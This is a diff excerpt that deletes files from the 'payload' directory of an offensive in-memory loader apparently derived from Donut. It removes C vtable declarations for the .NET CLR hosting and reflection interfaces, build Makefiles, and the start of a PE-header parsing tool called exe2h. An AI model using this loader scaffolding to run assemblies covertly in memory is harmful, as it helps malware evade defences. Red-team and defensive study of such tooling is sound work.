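-DUMMY_METHOD(CreateInstance_2);
-DUMMY_METHOD(CreateInstanceFrom_2);
-DUMMY_METHOD(CreateInstance_3);
-DUMMY_METHOD(CreateInstanceFrom_3);
-DUMMY_METHOD(Load);
-DUMMY_METHOD(Load_2);
-
-HRESULT (STDMETHODCALLTYPE *Load_3)(
-IAppDomain *This,
-SAFEARRAY *rawAssembly,
-IAssembly **pRetVal);
-
-DUMMY_METHOD(Load_4);
-DUMMY_METHOD(Load_5);
-DUMMY_METHOD(Load_6);
-DUMMY_METHOD(Load_7);
-DUMMY_METHOD(ExecuteAssembly);
-DUMMY_METHOD(ExecuteAssembly_2);
-DUMMY_METHOD(ExecuteAssembly_3);
-DUMMY_METHOD(FriendlyName);
-DUMMY_METHOD(BaseDirectory);
-DUMMY_METHOD(RelativeSearchPath);
-DUMMY_METHOD(ShadowCopyFiles);
-DUMMY_METHOD(GetAssemblies);
-DUMMY_METHOD(AppendPrivatePath);
-DUMMY_METHOD(ClearPrivatePath);
-DUMMY_METHOD(SetShadowCopyPath);
-DUMMY_METHOD(ClearShadowCopyPath);
-DUMMY_METHOD(SetCachePath);
-DUMMY_METHOD(SetData);
-DUMMY_METHOD(GetData);
-DUMMY_METHOD(SetAppDomainPolicy);
-DUMMY_METHOD(SetThreadPrincipal);
-DUMMY_METHOD(SetPrincipalPolicy);
-DUMMY_METHOD(DoCallBack);
-DUMMY_METHOD(DynamicDirectory);
-
-END_INTERFACE
-} AppDomainVtbl;
-
-typedef struct _AppDomain {
-AppDomainVtbl *lpVtbl;
-} AppDomain;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
-
-typedef struct _AssemblyVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAssembly * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAssembly * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAssembly * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-
-DUMMY_METHOD(Invoke);
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(CodeBase);
-DUMMY_METHOD(EscapedCodeBase);
-DUMMY_METHOD(GetName);
-DUMMY_METHOD(GetName_2);
-DUMMY_METHOD(FullName);
-
-HRESULT (STDMETHODCALLTYPE *EntryPoint)(
-IAssembly *This,
-IMethodInfo **pRetVal);
-
-HRESULT (STDMETHODCALLTYPE *GetType_2)(
-IAssembly *This,
-BSTR name,
-IType **pRetVal);
-
-DUMMY_METHOD(GetType_3);
-DUMMY_METHOD(GetExportedTypes);
-DUMMY_METHOD(GetTypes);
-DUMMY_METHOD(GetManifestResourceStream);
-DUMMY_METHOD(GetManifestResourceStream_2);
-DUMMY_METHOD(GetFile);
-DUMMY_METHOD(GetFiles);
-DUMMY_METHOD(GetFiles_2);
-DUMMY_METHOD(GetManifestResourceNames);
-DUMMY_METHOD(GetManifestResourceInfo);
-DUMMY_METHOD(Location);
-DUMMY_METHOD(Evidence);
-DUMMY_METHOD(GetCustomAttributes);
-DUMMY_METHOD(GetCustomAttributes_2);
-DUMMY_METHOD(IsDefined);
-DUMMY_METHOD(GetObjectData);
-DUMMY_METHOD(add_ModuleResolve);
-DUMMY_METHOD(remove_ModuleResolve);
-DUMMY_METHOD(GetType_4);
-DUMMY_METHOD(GetSatelliteAssembly);
-DUMMY_METHOD(GetSatelliteAssembly_2);
-DUMMY_METHOD(LoadModule);
-DUMMY_METHOD(LoadModule_2);
-DUMMY_METHOD(CreateInstance);
-DUMMY_METHOD(CreateInstance_2);
-DUMMY_METHOD(CreateInstance_3);
-DUMMY_METHOD(GetLoadedModules);
-DUMMY_METHOD(GetLoadedModules_2);
-DUMMY_METHOD(GetModules);
-DUMMY_METHOD(GetModules_2);
-DUMMY_METHOD(GetModule);
-DUMMY_METHOD(GetReferencedAssemblies);
-DUMMY_METHOD(GlobalAssemblyCache);
-
-END_INTERFACE
-} AssemblyVtbl;
-
-typedef enum _BindingFlags {
-BindingFlags_Default = 0,
-BindingFlags_IgnoreCase = 1,
-BindingFlags_DeclaredOnly = 2,
-BindingFlags_Instance = 4,
-BindingFlags_Static = 8,
-BindingFlags_Public = 16,
-BindingFlags_NonPublic = 32,
-BindingFlags_FlattenHierarchy = 64,
-BindingFlags_InvokeMethod = 256,
-BindingFlags_CreateInstance = 512,
-BindingFlags_GetField = 1024,
-BindingFlags_SetField = 2048,
-BindingFlags_GetProperty = 4096,
-BindingFlags_SetProperty = 8192,
-BindingFlags_PutDispProperty = 16384,
-BindingFlags_PutRefDispProperty = 32768,
-BindingFlags_ExactBinding = 65536,
-BindingFlags_SuppressChangeType = 131072,
-BindingFlags_OptionalParamBinding = 262144,
-BindingFlags_IgnoreReturn = 16777216
-} BindingFlags;
-
-typedef struct _Assembly {
-AssemblyVtbl *lpVtbl;
-} Assembly;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
-
-typedef struct _TypeVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IType * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IType * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IType * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(MemberType);
-DUMMY_METHOD(name);
-DUMMY_METHOD(DeclaringType);
-DUMMY_METHOD(ReflectedType);
-DUMMY_METHOD(GetCustomAttributes);
-DUMMY_METHOD(GetCustomAttributes_2);
-DUMMY_METHOD(IsDefined);
-DUMMY_METHOD(Guid);
-DUMMY_METHOD(Module);
-DUMMY_METHOD(Assembly);
-DUMMY_METHOD(TypeHandle);
-DUMMY_METHOD(FullName);
-DUMMY_METHOD(Namespace);
-DUMMY_METHOD(AssemblyQualifiedName);
-DUMMY_METHOD(GetArrayRank);
-DUMMY_METHOD(BaseType);
-DUMMY_METHOD(GetConstructors);
-DUMMY_METHOD(GetInterface);
-DUMMY_METHOD(GetInterfaces);
-DUMMY_METHOD(FindInterfaces);
-DUMMY_METHOD(GetEvent);
-DUMMY_METHOD(GetEvents);
-DUMMY_METHOD(GetEvents_2);
-DUMMY_METHOD(GetNestedTypes);
-DUMMY_METHOD(GetNestedType);
-DUMMY_METHOD(GetMember);
-DUMMY_METHOD(GetDefaultMembers);
-DUMMY_METHOD(FindMembers);
-DUMMY_METHOD(GetElementType);
-DUMMY_METHOD(IsSubclassOf);
-DUMMY_METHOD(IsInstanceOfType);
-DUMMY_METHOD(IsAssignableFrom);
-DUMMY_METHOD(GetInterfaceMap);
-DUMMY_METHOD(GetMethod);
-DUMMY_METHOD(GetMethod_2);
-DUMMY_METHOD(GetMethods);
-DUMMY_METHOD(GetField);
-DUMMY_METHOD(GetFields);
-DUMMY_METHOD(GetProperty);
-DUMMY_METHOD(GetProperty_2);
-DUMMY_METHOD(GetProperties);
-DUMMY_METHOD(GetMember_2);
-DUMMY_METHOD(GetMembers);
-DUMMY_METHOD(InvokeMember);
-DUMMY_METHOD(UnderlyingSystemType);
-DUMMY_METHOD(InvokeMember_2);
-
-HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
-IType *This,
-BSTR name,
-BindingFlags invokeAttr,
-IBinder *Binder,
-VARIANT Target,
-SAFEARRAY *args,
-VARIANT *pRetVal);
-
-DUMMY_METHOD(GetConstructor);
-DUMMY_METHOD(GetConstructor_2);
-DUMMY_METHOD(GetConstructor_3);
-DUMMY_METHOD(GetConstructors_2);
-DUMMY_METHOD(TypeInitializer);
-DUMMY_METHOD(GetMethod_3);
-DUMMY_METHOD(GetMethod_4);
-DUMMY_METHOD(GetMethod_5);
-DUMMY_METHOD(GetMethod_6);
-DUMMY_METHOD(GetMethods_2);
-DUMMY_METHOD(GetField_2);
-DUMMY_METHOD(GetFields_2);
-DUMMY_METHOD(GetInterface_2);
-DUMMY_METHOD(GetEvent_2);
-DUMMY_METHOD(GetProperty_3);
-DUMMY_METHOD(GetProperty_4);
-DUMMY_METHOD(GetProperty_5);
-DUMMY_METHOD(GetProperty_6);
-DUMMY_METHOD(GetProperty_7);
-DUMMY_METHOD(GetProperties_2);
-DUMMY_METHOD(GetNestedTypes_2);
-DUMMY_METHOD(GetNestedType_2);
-DUMMY_METHOD(GetMember_3);
-DUMMY_METHOD(GetMembers_2);
-DUMMY_METHOD(Attributes);
-DUMMY_METHOD(IsNotPublic);
-DUMMY_METHOD(IsPublic);
-DUMMY_METHOD(IsNestedPublic);
-DUMMY_METHOD(IsNestedPrivate);
-DUMMY_METHOD(IsNestedFamily);
-DUMMY_METHOD(IsNestedAssembly);
-DUMMY_METHOD(IsNestedFamANDAssem);
-DUMMY_METHOD(IsNestedFamORAssem);
-DUMMY_METHOD(IsAutoLayout);
-DUMMY_METHOD(IsLayoutSequential);
-DUMMY_METHOD(IsExplicitLayout);
-DUMMY_METHOD(IsClass);
-DUMMY_METHOD(IsInterface);
-DUMMY_METHOD(IsValueType);
-DUMMY_METHOD(IsAbstract);
-DUMMY_METHOD(IsSealed);
-DUMMY_METHOD(IsEnum);
-DUMMY_METHOD(IsSpecialName);
-DUMMY_METHOD(IsImport);
-DUMMY_METHOD(IsSerializable);
-DUMMY_METHOD(IsAnsiClass);
-DUMMY_METHOD(IsUnicodeClass);
-DUMMY_METHOD(IsAutoClass);
-DUMMY_METHOD(IsArray);
-DUMMY_METHOD(IsByRef);
-DUMMY_METHOD(IsPointer);
-DUMMY_METHOD(IsPrimitive);
-DUMMY_METHOD(IsCOMObject);
-DUMMY_METHOD(HasElementType);
-DUMMY_METHOD(IsContextful);
-DUMMY_METHOD(IsMarshalByRef);
-DUMMY_METHOD(Equals_2);
-
-END_INTERFACE
-} TypeVtbl;
-
-typedef struct ICLRRuntimeInfoVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICLRRuntimeInfo * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICLRRuntimeInfo * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICLRRuntimeInfo * This);
-
-HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
-ICLRRuntimeInfo * This,
-/* [size_is][out] */
-__out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer);
-
-HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
-ICLRRuntimeInfo * This,
-/* [size_is][out] */
-__out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer);
-
-HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
-ICLRRuntimeInfo * This,
-/* [in] */ HANDLE hndProcess,
-/* [retval][out] */ BOOL *pbLoaded);
-
-HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
-ICLRRuntimeInfo * This,
-/* [in] */ UINT iResourceID,
-/* [size_is][out] */
-__out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer,
-/* [lcid][in] */ LONG iLocaleID);
-
-HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
-ICLRRuntimeInfo * This,
-/* [in] */ LPCWSTR pwzDllName,
-/* [retval][out] */ HMODULE *phndModule);
-
-HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
-ICLRRuntimeInfo * This,
-/* [in] */ LPCSTR pszProcName,
-/* [retval][out] */ LPVOID *ppProc);
-
-HRESULT ( STDMETHODCALLTYPE *GetInterface )(
-ICLRRuntimeInfo * This,
-/* [in] */ REFCLSID rclsid,
-/* [in] */ REFIID riid,
-/* [retval][iid_is][out] */ LPVOID *ppUnk);
-
-HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
-ICLRRuntimeInfo * This,
-/* [retval][out] */ BOOL *pbLoadable);
-
-HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
-ICLRRuntimeInfo * This,
-/* [in] */ DWORD dwStartupFlags,
-/* [in] */ LPCWSTR pwzHostConfigFile);
-
-HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
-ICLRRuntimeInfo * This,
-/* [out] */ DWORD *pdwStartupFlags,
-/* [size_is][out] */
-__out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
-/* [out][in] */ DWORD *pcchHostConfigFile);
-
-HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
-ICLRRuntimeInfo * This);
-
-HRESULT ( STDMETHODCALLTYPE *IsStarted )(
-ICLRRuntimeInfo * This,
-/* [out] */ BOOL *pbStarted,
-/* [out] */ DWORD *pdwStartupFlags);
-
-END_INTERFACE
-} ICLRRuntimeInfoVtbl;
-
-typedef struct _ICLRRuntimeInfo {
-ICLRRuntimeInfoVtbl *lpVtbl;
-} ICLRRuntimeInfo;
-
-typedef struct _Type {
-TypeVtbl *lpVtbl;
-} Type;
-
-typedef struct ICLRMetaHostVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICLRMetaHost * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICLRMetaHost * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICLRMetaHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
-ICLRMetaHost * This,
-/* [in] */ LPCWSTR pwzVersion,
-/* [in] */ REFIID riid,
-/* [retval][iid_is][out] */ LPVOID *ppRuntime);
-
-HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
-ICLRMetaHost * This,
-/* [in] */ LPCWSTR pwzFilePath,
-/* [size_is][out] */
-__out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
-/* [out][in] */ DWORD *pcchBuffer);
-
-HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
-ICLRMetaHost * This,
-/* [retval][out] */ IEnumUnknown **ppEnumerator);
-
-HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
-ICLRMetaHost * This,
-/* [in] */ HANDLE hndProcess,
-/* [retval][out] */ IEnumUnknown **ppEnumerator);
-
-HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
-ICLRMetaHost * This,
-/* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
-
-HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
-ICLRMetaHost * This,
-/* [in] */ REFIID riid,
-/* [retval][iid_is][out] */ LPVOID *ppUnk);
-
-HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
-ICLRMetaHost * This,
-/* [in] */ INT32 iExitCode);
-
-END_INTERFACE
-} ICLRMetaHostVtbl;
-
-typedef struct _ICLRMetaHost
-{
-ICLRMetaHostVtbl *lpVtbl;
-} ICLRMetaHost;
-
-typedef struct ICorRuntimeHostVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICorRuntimeHost * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICorRuntimeHost * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
-ICorRuntimeHost * This,
-/* [in] */ DWORD *pFiberCookie);
-
-HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
-ICorRuntimeHost * This,
-/* [out] */ DWORD **pFiberCookie);
-
-HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
-ICorRuntimeHost * This,
-/* [out] */ DWORD *pCount);
-
-HRESULT ( STDMETHODCALLTYPE *MapFile )(
-ICorRuntimeHost * This,
-/* [in] */ HANDLE hFile,
-/* [out] */ HMODULE *hMapAddress);
-
-HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
-ICorRuntimeHost * This,
-/* [out] */ ICorConfiguration **pConfiguration);
-
-HRESULT ( STDMETHODCALLTYPE *Start )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *Stop )(
-ICorRuntimeHost * This);
-
-HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
-ICorRuntimeHost * This,
-/* [in] */ LPCWSTR pwzFriendlyName,
-/* [in] */ IUnknown *pIdentityArray,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
-ICorRuntimeHost * This,
-/* [out] */ HDOMAINENUM *hEnum);
-
-HRESULT ( STDMETHODCALLTYPE *NextDomain )(
-ICorRuntimeHost * This,
-/* [in] */ HDOMAINENUM hEnum,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
-ICorRuntimeHost * This,
-/* [in] */ HDOMAINENUM hEnum);
-
-HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
-ICorRuntimeHost * This,
-/* [in] */ LPCWSTR pwzFriendlyName,
-/* [in] */ IUnknown *pSetup,
-/* [in] */ IUnknown *pEvidence,
-/* [out] */ IUnknown **pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pAppDomainSetup);
-
-HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pEvidence);
-
-HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
-ICorRuntimeHost * This,
-/* [in] */ IUnknown *pAppDomain);
-
-HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
-ICorRuntimeHost * This,
-/* [out] */ IUnknown **pAppDomain);
-
-END_INTERFACE
-} ICorRuntimeHostVtbl;
-
-typedef struct _ICorRuntimeHost {
-ICorRuntimeHostVtbl *lpVtbl;
-} ICorRuntimeHost;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
-
-typedef struct _MethodInfoVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IMethodInfo *This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IMethodInfo *This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IMethodInfo *This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(MemberType);
-DUMMY_METHOD(name);
-DUMMY_METHOD(DeclaringType);
-DUMMY_METHOD(ReflectedType);
-DUMMY_METHOD(GetCustomAttributes);
-DUMMY_METHOD(GetCustomAttributes_2);
-DUMMY_METHOD(IsDefined);
-
-HRESULT ( STDMETHODCALLTYPE *GetParameters)(
-IMethodInfo *This,
-SAFEARRAY **pRetVal);
-
-DUMMY_METHOD(GetMethodImplementationFlags);
-DUMMY_METHOD(MethodHandle);
-DUMMY_METHOD(Attributes);
-DUMMY_METHOD(CallingConvention);
-DUMMY_METHOD(Invoke_2);
-DUMMY_METHOD(IsPublic);
-DUMMY_METHOD(IsPrivate);
-DUMMY_METHOD(IsFamily);
-DUMMY_METHOD(IsAssembly);
-DUMMY_METHOD(IsFamilyAndAssembly);
-DUMMY_METHOD(IsFamilyOrAssembly);
-DUMMY_METHOD(IsStatic);
-DUMMY_METHOD(IsFinal);
-DUMMY_METHOD(IsVirtual);
-DUMMY_METHOD(IsHideBySig);
-DUMMY_METHOD(IsAbstract);
-DUMMY_METHOD(IsSpecialName);
-DUMMY_METHOD(IsConstructor);
-
-HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
-IMethodInfo *This,
-VARIANT obj,
-SAFEARRAY *parameters,
-VARIANT *ret);
-
-DUMMY_METHOD(returnType);
-DUMMY_METHOD(ReturnTypeCustomAttributes);
-DUMMY_METHOD(GetBaseDefinition);
-
-END_INTERFACE
-} MethodInfoVtbl;
-
-typedef struct _MethodInfo {
-MethodInfoVtbl *lpVtbl;
-} MethodInfo;
-
-typedef struct ICorConfigurationVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-ICorConfiguration * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-ICorConfiguration * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-ICorConfiguration * This);
-
-HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
-ICorConfiguration * This,
-/* [in] */ IGCThreadControl *pGCThreadControl);
-
-HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
-ICorConfiguration * This,
-/* [in] */ IGCHostControl *pGCHostControl);
-
-HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
-ICorConfiguration * This,
-/* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
-
-HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
-ICorConfiguration * This,
-/* [in] */ DWORD dwSpecialThreadId);
-
-END_INTERFACE
-} ICorConfigurationVtbl;
-
-typedef struct _ICorConfiguration
-{
-ICorConfigurationVtbl *lpVtbl;
-}ICorConfiguration;
-
-typedef struct IGCThreadControlVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IGCThreadControl * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IGCThreadControl * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IGCThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
-IGCThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
-IGCThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
-IGCThreadControl * This,
-DWORD Generation);
-
-END_INTERFACE
-} IGCThreadControlVtbl;
-
-typedef struct _IGCThreadControl
-{
-IGCThreadControlVtbl *lpVtbl;
-}IGCThreadControl;
-
-typedef struct IGCHostControlVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IGCHostControl * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IGCHostControl * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IGCHostControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
-IGCHostControl * This,
-/* [in] */ SIZE_T sztMaxVirtualMemMB,
-/* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
-
-END_INTERFACE
-} IGCHostControlVtbl;
-
-typedef struct _IGCHostControl
-{
-IGCHostControlVtbl *lpVtbl;
-} IGCHostControl;
-
-typedef struct IDebuggerThreadControlVtbl
-{
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IDebuggerThreadControl * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IDebuggerThreadControl * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IDebuggerThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
-IDebuggerThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
-IDebuggerThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
-IDebuggerThreadControl * This,
-DWORD dwUnused);
-
-END_INTERFACE
-} IDebuggerThreadControlVtbl;
-
-typedef struct _IDebuggerThreadControl {
-IDebuggerThreadControlVtbl *lpVtbl;
-} IDebuggerThreadControl;
-
-#endif
-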
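--- a/payload/exe2h/Makefile
+++ b/payload/exe2h/Makefile
@@ -1,4 +0,0 @@
-exe2h:
-gcc -I ../../include -Wall exe2h.c -oexe2h
-clean:
-rm *.o exe2h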
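--- a/payload/exe2h/Makefile.mingw
+++ b/payload/exe2h/Makefile.mingw
@@ -1,4 +0,0 @@
-exe2h:
-x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe
-clean:
-rm exe2h.exe *.o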
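--- a/payload/exe2h/Makefile.msvc
+++ b/payload/exe2h/Makefile.msvc
@@ -1,4 +0,0 @@
-exe2h:
-cl exe2h.c mmap-windows.c
-clean:
-del exe2h.obj mmap-windows.obj exe2h.exe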
+0
-319
payload/exe2h/exe2h.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
